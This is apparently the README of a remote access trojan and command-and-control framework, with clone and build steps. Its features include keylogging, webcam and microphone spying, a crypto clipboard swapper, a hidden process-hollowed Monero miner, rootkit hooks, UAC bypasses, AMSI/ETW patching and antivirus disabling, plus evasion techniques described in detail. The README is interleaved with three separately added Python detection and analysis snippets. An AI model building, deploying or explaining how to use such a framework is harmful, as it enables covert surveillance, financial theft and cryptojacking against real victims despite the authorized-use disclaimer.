A Command & Control framework for authorized red team engagements and security research
SeroRAT is a modular C2 framework written in C# featuring a WPF server and a hardened NativeAOT client stub. It combines multi-vector persistence, advanced anti-analysis protections, a polymorphic crypter (closed-source), and encrypted TLS communication.
⚠️ For authorized use only. See Legal Notice.
```
git clone https://github.com/SeroSkiid/SeroC2
cd SeroC2
setup.bat   :: installs .NET SDK + VS Build Tools (run as Admin)
build.bat   :: release (dist folder)
```
You can also open `Sero.sln` in Visual Studio 2026, build (F6), and launch `SeroServer.exe`.
Configure and build the client stub from the Builder tab.
Miner module: Download xmrig and place `xmrig.exe` inside `xmrig-release/`. The miner builder will embed and encrypt it automatically.
| Feature | Status | Notes |
|---|---|---|
| Remote Desktop | ✅ | DXGI + GDI capture, 64×64 block diff, input injection, clipboard sync |
| Remote Webcam | ✅ | DirectShow SampleGrabber + VFW fallback |
| HVNC | ✅ | Hidden virtual desktop — isolated session, full browser support |
| Remote Shell | ✅ | Interactive cmd/PowerShell |
| File Manager | ✅ | Navigate, download, upload, rename, delete, hash, exec, wallpaper, 7-zip |
| TCP Manager | ✅ | List all TCP connections per PID, force-close via SetTcpEntry, Block IP / Block Port toolbar buttons |
| Startup Manager | ✅ | List/delete Registry Run, Startup folder, Scheduled Tasks, WMI Event Subscriptions — Authenticode signature + publisher per entry |
| Microphone | ✅ | Real-time audio capture, waveform visualization, live listen in server, save WAV |
| Fun | ✅ | CD-ROM, Taskbar, Screen, Mouse swap, Volume, TTS, Crazy Mouse, Screen Rotation… |
| Keylogger | ✅ | Low-level WH_KEYBOARD_LL hook, offline disk logging (by date), file browser UI, save .txt |
| Crypto Clipper | ✅ | Monitors clipboard for BTC/ETH/LTC/TRX/SOL/XMR/XRP/DASH/BCH/BNB, silent address swap |
| Performance Monitor | ✅ | Real-time CPU/RAM/Network streaming (1 s), sparkline graphs, color progress bars |
| Process Manager | ✅ | Real-time list, CPU/RAM heat-map, suspend/resume/kill (right-click), native icons, search filter |
| Service Manager | ✅ | List, start/stop/restart/disable/delete Windows services (requires admin) |
| Window Manager | ✅ | Enumerate all windows, show/hide/focus/close/kill per handle |
| Registry Editor | ✅ | Browse/read/write/delete keys and values (requires admin for HKLM), admin warning popup |
| Installed Programs | ✅ | List all installed apps, trigger silent uninstall |
| Device Manager | ✅ | Enumerate hardware devices via SetupAPI, uninstall device |
| TCP Connections | ✅ | List connections, close sessions, block process/port via Windows Firewall |
| Binder | ✅ | Bundle multiple files into a single launcher; per-file RunOnce (writes path to HKCU\RunOnce); custom icon injection; .NET Framework 4.8 loader compiled at build time |
| TikTok Bot | ✅ | Multi-client panel: CDP session detection (checks Chrome cookies before signup), auto-signup via Google OAuth (Chrome hidden), account inventory, comment broadcast with rotation across accounts |
| SOCKS5 Proxy | ✅ | Reverse SOCKS5 — tunnel traffic through the remote machine |
| File Execute | ✅ | Remote execution of arbitrary files |
| RunPE | ✅ | In-memory PE injection with PPID spoofing (builder only) |
| UAC Bypass | ✅ | computerdefaults → fodhelper → sdclt → mmc fallback chain (closed-source) |
| UAC Elevation | ✅ | UAC loop/once prompt |
| Update Client | ✅ | Seamless in-memory stub replacement |
| AutoTask Plugins | ✅ | C++ DLL plugins compiled and executed on-demand |
| Rootkit (hook DLL) | ✅ | Reflective DLL: NtQuerySystemInformation / NtQueryDirectoryFile hooks |
| Polymorphic Crypter | ✅ | Per-build AES-256-CBC, LZNT1, AMSI+ETW bypass (closed-source) |
| XMR Miner | ✅ | NativeAOT miner stub, SFC64+Deflate packing, in-memory OpenSSL detection, native TLS via CLI args, svchost hollowing, PPID spoof, idle throttle, BotKiller, watchdog |
| Multi-client | ✅ | Tags, per-session logs, HWID deduplication, geo-IP |
| Telegram Notify | ✅ | First-exec notification, HWID dedup, connection counter |
- Remote Desktop
- Remote Webcam
- HVNC
- File Manager
- Keylogger
- Crypto Clipper
- Process Manager
- RunPE / Process Hollowing
- Network Architecture
- How to Compile
- Project Structure
- Roadmap
- Legal Notice
- Right-click a client → Remote Desktop
- Adjust Quality (1–100) and Resolution (%) sliders
- Click Start — live feed appears in the viewer
- Interact directly: click, type, scroll, clipboard sync
- Click Stop to end the session
Primary — DXGI Desktop Duplication (IDXGIOutput1::DuplicateOutput):
- GPU-direct capture via the DWM compositor — no CPU copies
- Blocks on `AcquireNextFrame(timeout=16ms)` aligned to VBLANK — natural 60 fps pacing
Fallback — GDI BitBlt (GetDC + BitBlt):
- Works on RDP sessions, headless machines, non-BGRA GPU formats
- Multi-monitor aware via `EnumDisplayMonitors`
Delta compression — 64×64 block diff:
- Only changed blocks are encoded and transmitted
- Below 15% change → quality boosted to 95 for sharp text
- Above threshold → full frame sent instead
Input injection via SendInput: mouse + keyboard (virtual key codes + extended key flag)
- Right-click a client → Remote Webcam
- Select a device from the dropdown
- Adjust Quality and FPS → click Start
Primary — DirectShow (COM, pure P/Invoke):
- Device enumeration: `ICreateDevEnum` + `CLSID_VideoInputDeviceCat`
- Capture graph: `ICaptureGraphBuilder2` + `ISampleGrabber` targeting RGB24 or YUY2
- JPEG encode: raw pixels → GDI+ `GdipSaveImageToStream`

Fallback — VFW (avicap32.dll):
- `capCreateCaptureWindow` + `WM_CAP_*` messages
- `[UnmanagedCallersOnly]` frame callback — no delegate allocation per frame
Hidden Virtual Desktop — creates an isolated Windows session invisible to the user.
- Right-click a client → HVNC
- Use the browser launcher buttons (Explorer, Chrome, Firefox, Edge, Brave, Opera, Opera GX, Telegram, Discord) for instant stealth sessions
- Full mouse + keyboard input injection on the hidden desktop
Full remote file system browser with icon-per-extension UI.
- Navigate — browse drives, directories, double-click to enter
- GoTo shortcuts — Desktop, User Folder, Temp, AppData, Startup
- Download / Upload — single file up/down
- Execute — Normal, Hidden, or As Admin
- Rename / Delete / New Folder
- SHA-256 Hash — computed on client, copied to clipboard
- Show / Hide — toggle hidden file attribute
- Set as Wallpaper — set any image as desktop background
- Play Music — open audio file with default player
- 7-Zip compress — zip via PowerShell Compress-Archive
- Download from URL — pull file from internet directly to client
Lists all active TCP connections (PID, process name, local/remote address, state). Force-close connections via SetTcpEntry(DELETE_TCB). Block IP and Block Port toolbar buttons create Windows Firewall rules (inbound + outbound) for the selected connection.
Enumerates and deletes startup entries from:
- Registry `HKCU\Run` / `HKLM\Run` / `RunOnce`
- User and Common Startup folders (`.lnk`)
- Scheduled Tasks (via `schtasks /query`)
- WMI Event Subscriptions (`__EventFilter`, `CommandLineEventConsumer`, `__FilterToConsumerBinding`)
Each entry shows an Authenticode verification status (Verified / Not Verified) with publisher name, checked via WinVerifyTrust. Unverified entries are highlighted in red (like Autoruns).
Real-time audio capture using WaveIn (WinMM):
- Device enumeration and selection
- Live waveform visualization (bar graph, 50 ms refresh)
- Buffered PCM stream (16-bit, 16 kHz, mono)
- Save as WAV — proper WAV header written to disk
Interactive prank / control panel:
| Section | Actions |
|---|---|
| CD-ROM | Eject / Close |
| Taskbar | Show / Hide |
| Explorer | Kill / Start |
| Screen | On / Off |
| Clock / Tray | Show / Hide |
| Desktop Icons | Show / Hide |
| Mouse | Normal / Swap buttons |
| Volume | +5 / −5 / Mute |
| Screen Rotation | 0° / 90° / 180° / 270° |
| Crazy Mouse | Random mouse for N seconds |
| Text to Speech | Speak any text via System.Speech |
| Message Box | Show popup dialog on victim screen |
| Open URL | Open any URL in default browser |
Low-level global keyboard hook using WH_KEYBOARD_LL — invisible to the user, captures all keystrokes system-wide.
- Window-title headers — each context switch is logged with the app name and UTC timestamp
- Auto-sync — server pulls buffered logs every 10 seconds while capturing
- Manual get / clear — request logs on demand or wipe the buffer on client
- Save as TXT — export the full log from the server UI
The stub installs a low-level keyboard hook via SetWindowsHookEx(WH_KEYBOARD_LL). The hook callback ([UnmanagedCallersOnly], NativeAOT-safe) converts VK codes to characters using ToUnicode with the current keyboard layout (handles international keyboards, Shift, CapsLock). The log is buffered in memory and capped at 512 KB; the server drains and displays it in a scrollable monospace text area.
Silently monitors the clipboard and replaces detected crypto addresses with your own.
BTC · ETH/BNB · LTC · TRX · SOL · XMR · XRP · DASH · BCH
- Per-coin addresses — configure a replacement address for each currency independently
- Detection log — every replacement is logged to the server UI with timestamp, coin type, and truncated original address
- Live counter — total replacements shown in the server window
- Enable / disable — toggle without reconnecting; state persists until changed
The stub polls the clipboard every ~450 ms using native Win32 OpenClipboard / GetClipboardData / SetClipboardData (no Windows Forms dependency, fully NativeAOT-compatible). Detected addresses are matched against regex patterns and replaced atomically. A real-time notification is sent to the server via ClipperDetected packet so the operator sees every swap instantly.
Live view of all running processes on the target with native Windows shell icons.
- Process list — name, PID, working-set memory, main window title
- Native icons — shell icon extracted from the process EXE via `SHGetFileInfo`
- Search — filter by name or window title in real time
- Suspend / Resume / Kill — right-click context menu
- Refresh — manual refresh button
Full in-memory PE injection pipeline, NativeAOT-compatible.
Pipeline:
- `CreateProcess(..., CREATE_SUSPENDED | DETACHED_PROCESS)` against a configurable host (`svchost.exe`, `dllhost.exe`, …)
- PPID Spoofing — `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS)`: injected process appears as child of `explorer.exe` (user) or `winlogon.exe` (admin)
- `NtUnmapViewOfSection` → `VirtualAllocEx` + `WriteProcessMemory` + base relocations
- IAT fixup — walks the import directory, resolves each DLL/function via `GetProcAddress`
- `SetThreadContext` sets `RCX = EntryPoint + ImageBase` → `ResumeThread`
Credit — RunPE originally authored by Hydra48 (process-hollowing-24h2), converted to C#/NativeAOT by SeroSkiid.
Native DLL plugins compiled on-demand and delivered in-process. Only disk artifact is the temp DLL, deleted after execution. Cached by source hash.
| Plugin | Action |
|---|---|
| Exclude C:\ | Adds C:\ to Defender exclusions via WMI MSFT_MpPreference (SYSTEM token steal) |
| Block AV DNS | Redirects ~80 AV update/telemetry domains to 127.0.0.1 in hosts file. Blocks DoT (port 853). Flushes DNS. |
| Block Reset | Patches ReAgent.xml to disable WRE. Blocks Etcher/Rufus/USB tools. |
| BotKiller | Kills processes from %TEMP%, masquerade detections, unsigned random-name executables. Cleans startup. |
| Disable UAC | Sets EnableLUA=0, ConsentPromptBehaviorAdmin=0, ConsentPromptBehaviorUser=0, PromptOnSecureDesktop=0 via PowerShell (requires admin; takes effect on next logon). |
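
The Exclude C:\, Block AV DNS and Disable UAC rows above each leave host state that a responder can audit. The following is an added example, not code from the repository: it takes the hosts file text, the UAC policy values and the Defender exclusion list as inputs, and the vendor suffixes and sample data are constructed placeholders because the page does not list the affected domains.

```python
import ipaddress
import re

# UAC values the "Disable UAC" row sets to 0. ConsentPromptBehaviorUser is left
# out: 0 there only denies elevation for standard users, so it is weak evidence.
UAC_WEAKENING = ("EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop")


def sinkholed_hosts(hosts_text, watch_suffixes):
    """Return watched hostnames that the hosts file maps to a local address."""
    hits = []
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address, skip the malformed line
        if not (addr.is_loopback or addr.is_unspecified):
            continue
        for name in (f.lower().rstrip(".") for f in fields[1:]):
            if any(name == s or name.endswith("." + s) for s in watch_suffixes):
                hits.append(name)
    return hits


def weakened_uac(policy):
    """Return the UAC policy value names that are present and set to 0."""
    return [name for name in UAC_WEAKENING if policy.get(name) == 0]


def drive_root_exclusions(paths):
    """Return Defender exclusion paths that cover an entire drive."""
    return [p for p in paths if re.fullmatch(r"[A-Za-z]:\\?", p.strip())]


def audit(hosts_text, policy, exclusions, watch_suffixes):
    """Combine the three checks into a flat list of findings."""
    findings = []
    sunk = sinkholed_hosts(hosts_text, watch_suffixes)
    if sunk:
        findings.append(f"hosts: {len(sunk)} watched names redirected to a local address")
    findings += [f"uac: {name}=0" for name in weakened_uac(policy)]
    findings += [f"defender: whole-drive exclusion {p}" for p in drive_root_exclusions(exclusions)]
    return findings


# Constructed sample state (placeholder vendor domains, not taken from the page).
WATCH_SUFFIXES = ("av-vendor-one.example", "av-vendor-two.example")
SAMPLE_HOSTS = """\
# Sample hosts file
127.0.0.1 localhost
::1 localhost
127.0.0.1 update.av-vendor-one.example
127.0.0.1 telemetry.av-vendor-one.example   # constructed
127.0.0.1 defs.av-vendor-two.example cdn.av-vendor-two.example
0.0.0.0 ads.tracker.example
"""
SAMPLE_POLICY = {"EnableLUA": 0, "ConsentPromptBehaviorAdmin": 0,
                 "ConsentPromptBehaviorUser": 0, "PromptOnSecureDesktop": 0}
SAMPLE_EXCLUSIONS = ["C:\\", r"D:\Builds\cache"]

if __name__ == "__main__":
    for finding in audit(SAMPLE_HOSTS, SAMPLE_POLICY, SAMPLE_EXCLUSIONS, WATCH_SUFFIXES):
        print(finding)
```

On a live host the policy values are read from `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` and the exclusion list from the Defender preferences.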
The stub copies itself to %AppData%\Roaming\<PersistName>\<HiddenFileName>.
| Method | Visibility | Implementation |
|---|---|---|
| Registry `HKCU\Run` | Visible | `NtSetValueKey` (bypasses behavioral hook) |
| Startup Folder `.lnk` | Visible | Native binary Shell Link writer (no COM) |
| Scheduled Task | Hidden from Startup tab | `schtasks /Create` + `ONLOGON /IT` |
| Registry `HKLM\Run` | Admin only | `NtSetValueKey` |
Watchdog: file lock on installed exe + backup, FileSystemWatcher instant restore, 5-second polling fallback, isolated PPID-spoofed persistence worker (breaks Defender Persistence.A!ml correlation).
- DACL — `ACE DENY PROCESS_TERMINATE + PROCESS_SUSPEND_RESUME` for `Everyone` — blocks Task Manager and all tools without `SeDebugPrivilege`
- 4 guardian processes in `dllhost.exe` / `SearchProtocolHost.exe` / `SearchFilterHost.exe` with PPID spoofing, staggered 800ms apart
The crypter / loader / UAC bypass is closed-source and NOT included in this repository.
The builder generates a polymorphic native C++ loader that encrypts and launches the stub in memory.
UAC Bypass: SilentCleanup windir-hijack → scheduled task → CMSTP INF → EventVwr → WsReset → Sdclt → ComputerDefaults → Fodhelper — non-registry methods tried first
SYSTEM Elevation: SeDebugPrivilege → winlogon.exe token duplication → CreateProcessWithTokenW
Encryption pipeline:
- LZNT1 compression via `ntdll!RtlCompressBuffer`
- AES-256-CBC with random per-build key/IV embedded as RCDATA resource
- SFC64 stream cipher — resource payload encoding (1:1 ratio, 32-byte random seed per build)
Polymorphism: per-build random AES key split across 3 binary locations, random 8-byte magic signature, unique BuildId GUID, random junk function names and shuffled call order.
AMSI + ETW Bypass: ETW patched first (EtwEventWrite) then AMSI (AmsiScanBuffer) via NtWriteVirtualMemory; 4-byte push 0; pop eax; ret patch, XOR-obfuscated per build.
| Protection | Technique |
|---|---|
| Anti-Debug | IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess, NtSetInformationThread(ThreadHideFromDebugger), timing check |
| Anti-VM | BIOS registry keywords (VMware/VirtualBox), VMware Tools key, VirtualBox Guest Additions key |
| Anti-Detect | Process blacklist (x64dbg, IDA, Wireshark, ProcessHacker…), suspicious usernames, CIS country block (RU/BY/KZ/AM/AZ/KG/TJ/TM/UZ/MD) |
| Anti-Sandbox | Scoring: uptime < 3min, sleep-skip detection, temp files < 3, RAM < 1 GB, installed programs < 8 |
- TLS 1.2+ with SHA-256 certificate pinning
- Shared-key authentication verified on every connection
- 3-second heartbeat + RTT measurement (ping/pong)
- Auto-reconnect with configurable delay (default 5s), multi-host round-robin
Packet format: 4-byte little-endian length prefix + UTF-8 JSON body. Max 100 MB per packet, 60-second read timeout.
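
For an analyst working from an already-decrypted capture of this traffic in a lab, the framing above can be split with a bounded incremental decoder. This is an added example, not code from the repository; the `FrameDecoder` class and the JSON field names in the sample are hypothetical, and only the length prefix, encoding and 100 MB cap come from the page.

```python
import json
import struct

MAX_PACKET = 100 * 1024 * 1024  # 100 MB cap stated on the page


class FrameError(ValueError):
    """Raised when the byte stream cannot be a valid frame sequence."""


class FrameDecoder:
    """Incremental decoder: 4-byte little-endian length + UTF-8 JSON body."""

    def __init__(self, max_len=MAX_PACKET):
        self.max_len = max_len
        self.buf = bytearray()

    def feed(self, chunk):
        """Append captured bytes; return the JSON bodies completed so far."""
        self.buf += chunk
        out = []
        while len(self.buf) >= 4:
            (length,) = struct.unpack_from("<I", self.buf, 0)
            # Reject before buffering: a hostile peer can declare up to 4 GiB.
            if length > self.max_len:
                raise FrameError(f"declared length {length} exceeds cap {self.max_len}")
            if len(self.buf) < 4 + length:
                break  # body not fully captured yet
            body = bytes(self.buf[4:4 + length])
            del self.buf[:4 + length]
            try:
                out.append(json.loads(body.decode("utf-8")))
            except (UnicodeDecodeError, json.JSONDecodeError) as exc:
                raise FrameError(f"body is not UTF-8 JSON: {exc}") from exc
        return out


def sample_frame(obj):
    """Build one constructed frame for the demo below (hypothetical fields)."""
    body = json.dumps(obj).encode("utf-8")
    return struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    wire = sample_frame({"type": "ping", "seq": 1}) + sample_frame({"type": "pong", "seq": 1})
    dec = FrameDecoder()
    # Feed in uneven pieces, as a TCP reassembly would deliver them.
    for piece in (wire[:3], wire[3:10], wire[10:]):
        for msg in dec.feed(piece):
            print(msg)
```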
Standalone Monero mining module, fully separate from the main RAT stub.
Features:
- Embeds xmrig at build time — SFC64 stream cipher + Deflate compression (random seed per build)
- Native TLS — scans xmrig in memory for the OpenSSL marker at runtime; if found, passes `--tls` directly on the command line (no proxy, no config file); falls back to a loopback TLS-terminating proxy for builds without OpenSSL
- CLI-arg launch — all pool parameters (`-o`, `-u`, `-p`, `-a`, `--tls`, `--randomx-no-rdmsr`) are passed on the command line; no `config.json` dependency for the pool connection
- Process hollowing — xmrig runs inside a legitimate `svchost.exe` via NtCreateSection/NtMapViewOfSection; no xmrig file touches disk during mining
- PPID spoofing — hollowed process appears as a child of `explorer.exe`
- Idle throttle — full CPU when idle, drops to active limit when user is at the machine
- Stealth — kills hollowed xmrig if Process Explorer / Task Manager / Process Hacker is detected; restarts cleanly when they close
- Watchdog — in-process file integrity watchdog (FileSystemWatcher + polling), backup copy, named-event clean exit; persistence restore only runs when `EnableStartup=true`
- SafeBoot persistence — optional service registered in SafeBoot registry keys
- Stats server — optional lightweight HTTP dashboard (token-protected)
- BotKiller — kills competing miners on startup and every 30 s
Setup: place xmrig.exe (with OpenSSL) in xmrig-release/ before building.
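
Both the RunPE pipeline and the miner's hollowing place a system host binary under a parent it does not normally have, which process-creation telemetry exposes. The following detection sketch is an added example, not code from the repository; the expected-parent baseline is an assumption to tune per environment, and the events are constructed in the style of Sysmon process-creation fields.

```python
import ntpath

# Expected parent image per child image. This baseline is an assumption based
# on common Windows behaviour; tune it against your own fleet before alerting.
EXPECTED_PARENTS = {
    "svchost.exe": {"services.exe"},
    "dllhost.exe": {"svchost.exe", "services.exe"},
    "searchprotocolhost.exe": {"searchindexer.exe"},
    "searchfilterhost.exe": {"searchindexer.exe"},
}


def _name(path):
    """Lower-cased file name of a Windows path, on any analysis OS."""
    return ntpath.basename(path).lower()


def lineage_findings(event):
    """Return the reasons one process-creation event looks like a hollowed host."""
    image, parent = _name(event["Image"]), _name(event["ParentImage"])
    reasons = []
    expected = EXPECTED_PARENTS.get(image)
    if expected is not None and parent not in expected:
        reasons.append(f"{image} has unexpected parent {parent}")
    # Service hosts are normally started with "-k <group>".
    if image == "svchost.exe" and "-k" not in event["CommandLine"].lower().split():
        reasons.append("svchost.exe started without -k")
    return reasons


def scan(events):
    """Map event index -> reasons, for events with at least one reason."""
    flagged = {}
    for i, ev in enumerate(events):
        reasons = lineage_findings(ev)
        if reasons:
            flagged[i] = reasons
    return flagged


# Constructed events: one normal service host, three suspicious, one unrelated.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\dllhost.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe",
     "CommandLine": r"C:\Windows\System32\dllhost.exe"},
    {"Image": r"C:\Windows\System32\SearchProtocolHost.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\System32\SearchProtocolHost.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], reasons)
```

Because the logged parent is the spoofed one, the rule fires on the mismatch itself and does not need to recover the true creator.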
Prerequisites:
- .NET 10 SDK
- Visual Studio 2022 with Desktop development with C++ workload
- Windows SDK 10.0.22621+
```
setup.bat
```
Run as Administrator — installs everything via winget (.NET SDK, VS Build Tools 2022 with MSVC + Windows SDK).
```
build.bat
```
Produces `dist\SeroServer.exe` (self-contained, no .NET runtime required on target).
Or open Sero.sln in Visual Studio 2022 and press F6.
- Launch `SeroServer.exe`
- Go to the Builder tab
- Configure hosts, auth key, persistence, hollow target
- Click Build — the stub is compiled with NativeAOT and optionally crypted
- Place `xmrig.exe` (with OpenSSL support) in `xmrig-release/`
- In the server, go to Builder → XMR tab
- Fill wallet, pool, CPU limits
- Click Build Miner
Optional — UPX compression (8 MB → 2.4 MB):
Download upx.exe (Windows x64) and place it either:
- in your `PATH`, or
- in a `tools/` folder next to `SeroServer.exe`
Then tick UPX compression in the Builder before clicking Build. The tools/ folder is gitignored — the binary stays local.
Troubleshooting:
- `cl.exe` (MSVC) missing → run `setup.bat`
- `vswhere.exe` not found → add `C:\Program Files (x86)\Microsoft Visual Studio\Installer` to PATH
- NativeAOT requires `win-x64` RID — do not mix in wasm workloads
- UPX not found → see above
SeroC2/
├── server/ # C2 Server (WPF · .NET 10)
│ ├── UI/ # Windows
│ │ ├── ServerWindow.* # Main dashboard + builder
│ │ ├── RemoteDesktopWindow.* # RDP viewer
│ │ ├── HvncWindow.* # HVNC viewer
│ │ ├── WebcamWindow.* # Webcam viewer
│ │ ├── RemoteShellWindow.* # Interactive shell
│ │ ├── FileManagerWindow.* # Remote file browser
│ │ ├── TcpManagerWindow.* # TCP connection manager
│ │ ├── StartupManagerWindow.* # Startup entries manager
│ │ ├── MicrophoneWindow.* # Microphone capture + waveform + live listen
│ │ ├── FunWindow.* # Fun / prank controls
│ │ ├── KeyloggerWindow.* # Keylogger viewer
│ │ ├── CryptoClipperWindow.* # Crypto clipper config + detection log
│ │ └── ClientLogWindow.* # Per-client activity log
│ ├── Builder/ # Build pipeline (config gen, NativeAOT, crypter bridge)
│ ├── Net/ # TLS server + certificate + Discord RPC
│ ├── Data/ # JSON datastore, client records, autotask queue
│ ├── Protocol/ # Packet protocol + all data classes
│ └── SeroServer.csproj
│
├── stub/ # Client stub (.NET 10 · NativeAOT)
│ ├── Program.cs # Entry point + protection init
│ ├── TlsClient.cs # TLS client + full command dispatch
│ ├── Protection.cs # Anti-analysis + guardian watchdog + Defender exclusion (registry P/Invoke)
│ ├── Persistence.cs # Registry + Startup + Task + file watchdog
│ ├── TelegramNotifier.cs # First-exec Telegram notification
│ ├── RemoteDesktopFeature.cs # DXGI + GDI BitBlt, 64×64 block diff
│ ├── DxgiCapture.cs # DXGI Desktop Duplication
│ ├── WebcamFeature.cs # DirectShow SampleGrabber
│ ├── WebcamDShow.cs # VFW avicap32 fallback
│ ├── HvncFeature.cs # Hidden virtual desktop
│ ├── FileManagerFeature.cs # Remote file system operations
│ ├── TcpManagerFeature.cs # TCP table + force-close
│ ├── StartupManagerFeature.cs # Startup enumeration + deletion
│ ├── MicrophoneFeature.cs # WaveIn PCM capture
│ ├── FunFeature.cs # Fun commands (TTS, msgbox, screen, etc.)
│ ├── KeyloggerFeature.cs # WH_KEYBOARD_LL hook, offline disk logging (by date)
│ ├── CryptoClipperFeature.cs # Clipboard monitoring + crypto address swap
│ ├── ProcessManagerFeature.cs # Process enumeration + kill
│ ├── TikTokFeature.cs # TikTok comment API (video + livestream)
│ ├── TikTokCdpFeature.cs # Chrome DevTools Protocol auto-signup (no HVNC, minimal TCP WS)
│ ├── Socks5Feature.cs # Reverse SOCKS5 relay
│ ├── ProcessHollowing.cs # RunPE + PPID spoofing
│ ├── Rootkit.cs # Reflective hook DLL injection
│ ├── Config.cs # ⚠️ AUTO-GENERATED by builder (no secrets in repo)
│ └── SeroStub.csproj
│
├── miner-stub/ # XMR miner stub (.NET 10 · NativeAOT)
│ ├── Program.cs # Miner main loop + TLS proxy
│ ├── MinerConfig.cs # ⚠️ AUTO-GENERATED by builder (no secrets in repo)
│ └── MinerStub.csproj
│
├── miner-uninstaller/ # Silent miner removal utility
├── stats-server/ # Lightweight HTTP stats dashboard
│
├── hook/ # User-mode rootkit (Microsoft Detours)
│ └── hook/
│ ├── dllmain.cpp # NtQuerySystemInformation, NtQueryDirectoryFile hooks
│ └── ReflectiveDllMain.cpp # Reflective PE loader (PEB walk, no imports)
│
├── setup.bat # Prerequisite installer (run as Admin)
├── setup-prerequisites.ps1 # winget automation (.NET SDK + VS Build Tools)
├── build.bat # Quick build launcher
├── build.ps1 # Self-contained server publish to dist/
├── start_stats.bat # Launch stats server (fill TOKEN before use)
└── Sero.sln
Not included in this repository (closed-source):
- Native C++ loader / crypter
- UAC bypass implementation
- `xmrig-release/xmrig.exe` — download separately from xmrig/xmrig
- Remote Desktop — DXGI + GDI, 64×64 block diff, multi-monitor
- Remote Webcam — DirectShow SampleGrabber + VFW fallback
- HVNC — hidden virtual desktop, browser launchers (Chrome, Edge, Firefox, Brave, Opera…)
- Remote Shell — interactive cmd / PowerShell
- File Manager — browse, download, upload, exec, hash, wallpaper, 7-zip
- TCP Manager — list connections, force-close via SetTcpEntry
- Startup Manager — Registry Run / RunOnce, Startup folder, Scheduled Tasks, WMI Event Subscriptions, Authenticode signature + publisher (red highlight for unsigned entries)
- Microphone — WaveIn capture, live server playback, save WAV
- Fun panel — CD-ROM, taskbar, screen, TTS, crazy mouse, screen rotation…
- XMR Miner — NativeAOT, process hollowing, idle throttle, OpenSSL TLS
- Telegram notification — first-exec, HWID dedup, global victim counter
- AutoTask plugins — native C++ DLL compiled on-demand, cached by hash
- Multi-host + auto-reconnect — round-robin, configurable delay
- Keylogger — WH_KEYBOARD_LL, window-title headers, offline disk logging by date, file browser UI, download/delete log files
- Crypto Clipper — BTC / ETH / BNB / LTC / TRX / SOL / XMR / XRP / DASH / BCH, global server tab, auto-push on connect
- Process Manager — real-time list, CPU/RAM heat-map (blue→orange→red), suspend/resume/kill via right-click, native icons, search filter; Live button removed (on-demand refresh)
- Service Manager — list all services via sc.exe query, start/stop/restart/disable/delete via right-click (admin required for write operations)
- Window Manager — EnumWindows P/Invoke, show/hide/focus/restore/minimize/maximize/close/kill per HWND, right-click actions
- Registry Editor — browse sub-keys, read/write/delete values and keys, admin warning popup when client not elevated (admin required for HKLM writes)
- Installed Programs — HKLM+HKCU Uninstall registry enumeration, trigger UninstallString silently, right-click actions
- Device Manager — SetupAPI enumeration (no WMI), uninstall device by instance ID, right-click actions
- TCP Connections — toolbar Block IP / Block Port buttons (netsh advfirewall), force-close via SetTcpEntry, right-click close/kill
- Fun panel toggle feedback — Show/Hide button pairs highlight the active state (white + blue left accent = active, heavily dimmed = inactive partner); screen rotation shows current angle
- Offline clients RAM column — LastRamDisplay shown in the offline clients grid
- All feature windows — fullscreen (maximize/restore) button; drag blocked when maximized
- CPU/RAM telemetry — GetSystemTimes + GlobalMemoryStatusEx sampling every ~15 s, displayed as columns in client list with color-coded brush
- Reverse SOCKS5 proxy — tunnel traffic through the remote machine, local SOCKS5 listener
- TikTok Bot — multi-client panel: CDP session detection (navigates to tiktok.com and reads Chrome cookies via `Network.getCookies` — skips signup if session exists), CDP auto-signup via Google OAuth (Chrome hidden, no HVNC), account inventory, comment broadcast with rotation across all accounts; cookie auto-flows from signup to comment panel, post comments on videos and livestreams using an existing session
- Stub size — 8.00 MB NativeAOT / 2.36 MB with UPX `--best --lzma` (all features incl. Keylogger, Crypto Clipper, Telegram notify)
- Polymorphic Crypter — AES-256-CBC, LZNT1, AMSI+ETW bypass (closed-source)
- UAC Bypass chain — computerdefaults → fodhelper → sdclt → mmc (closed-source)
- Rootkit — reflective DLL, NtQuerySystemInformation / NtQueryDirectoryFile hooks
- SeroSkiid — Lead developer
- Hydra48 — Original RunPE C++ implementation (process-hollowing-24h2), converted to C#/NativeAOT by SeroSkiid
This framework is provided for educational purposes and authorized security testing only.
Permitted: red team engagements with written client authorization · penetration testing under a formal contract · academic security research · defensive analysis of internal environments
Prohibited: deployment without explicit system owner consent · data exfiltration · cyberattacks or service disruption · any illegal or malicious activity
Users are solely responsible for compliance with applicable laws in their jurisdiction. The developer is not responsible for misuse.
SeroC2 is licensed under the MIT License.
Developed by SeroSkiid

